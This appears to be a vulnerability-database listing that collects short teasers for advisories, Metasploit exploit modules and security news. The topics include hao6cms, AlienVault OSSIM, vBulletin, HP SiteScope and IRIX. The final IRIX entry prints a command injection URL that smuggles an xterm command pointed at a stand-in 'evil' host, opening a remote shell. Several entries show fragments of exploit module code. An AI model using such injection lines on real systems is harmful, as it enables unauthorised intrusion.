Code execution vulnerability in hao6cms v2.0 config_edit.asp file

hao6cms is an enterprise website management system. A code execution vulnerability exists in the hao6cms v2.0 configedit.asp file. The vulnerability is due to the parameters failed to filter the direct splicing written to the configuration file, an attacker can exploit the vulnerability to obtain...

Patch Tuesday Returns; Microsoft Quiet on Postponement

Patch Tuesday returned today as expected after last month’s postponement with a giant release of fixes that includes patches for vulnerabilities disclosed and exploited since the last set of updates in January. Microsoft, however, was relatively silent on the reasons why the February updates were...

AlienVault OSSIM av-centerd Command Injection

This module exploits a code execution flaw in AlienVault 4.6.1 and prior. The vulnerability exists in the av-centerd SOAP web service, where the updatesysteminfodebianpackage method uses perl backticks in an insecure way, allowing command injection. This module has been tested successfully on...

Facebook Bug Bounty Submissions Dramatically Increase

Facebook today reported a dramatic increase in 2013 submissions to its bug bounty program, and said that despite reports from researchers that it’s becoming difficult to find severe bugs on its various properties, the social network plans to increase rewards for critical bugs. “The volume of...

HP SiteScope issueSiebelCmd - Remote Code Execution (Metasploit)

This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'rexml/document' class Metasploit3 /Apache-Coyote/ include REXML include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS def...

RHEL 5 : flash-plugin (RHSA-2012:1203)

The remote Redhat Enterprise Linux 5 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2012:1203 advisory. The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. This update fixes several...

vBulletin <= 3.0.6 (Template) Command Execution Exploit (metasploit)

No description provided by source. Title: vBulletin = 3.0.6 Add Template Name in HTML Comments = Yes command execution eXploit Name: phpvb306.pm License: Artistic/BSD/GPL Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good. - This is an exploit...

vBulletin 3.0.6 - 'template' Command Execution (Metasploit)

Title: vBulletin 'vBulletin '$Revision: 1.0 $', 'Authors' = 'str0ke' , 'Arch' = , 'OS' = , 'Priv' = 0, 'UserOpts' = 'RHOST' = 1, 'ADDR', 'The target address', 'RPORT' = 1, 'PORT', 'The target port', 80, 'VHOST' = 0, 'DATA', 'The virtual host name of the server', 'RPATH' = 1, 'DATA', 'Path to the...

Important: Red Hat Security Advisory: postgresql security update

Updated postresql packages that correct various security issues are now available for Red Hat Enterprise Linux 4. This update has been rated as having important security impact by the Red Hat Security Response Team. A flaw in the LOAD command in PostgreSQL was discovered. A local user could use...

SILLY BEHAVIOR Part II : Internet Explorer 5.5 - 6.0

Thursday, May 1, 2003 The following represents a trivial yet elaborate method of injecting arbitrary html into the "My Computer" zone on win98 using the Internet Explorer series of browsers. The manufacturer, commonly known as "Microsoft" has a done a splendid job of battening down the hatches wi...

DSA-265 bonsai - several vulnerabilities

Bulletin has no description...

IRIX 6.4 - 'pfdisplay.cgi' Code Execution

source: https://www.securityfocus.com/bid/64/info There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018. $ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'...